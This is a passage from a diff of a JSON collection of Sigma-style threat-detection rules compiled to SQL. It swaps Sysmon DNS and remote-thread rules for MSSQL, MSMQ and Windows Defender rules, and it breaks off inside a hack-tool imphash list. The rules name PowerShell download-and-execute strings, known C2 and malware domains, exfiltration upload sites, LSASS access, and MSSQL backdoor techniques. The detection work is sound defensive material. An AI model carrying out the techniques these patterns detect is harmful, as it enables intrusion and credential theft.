"filename": "win_software_restriction_policies_block.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Legitimate administrative scripts" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Legitimate use of the feature by administrators (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.execution" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "status": "experimental", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", - "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "status": "test", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "status": "experimental", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "description": "Detects the restoration of files from the defender quarantine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", - "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_defender_threat.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", - "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE 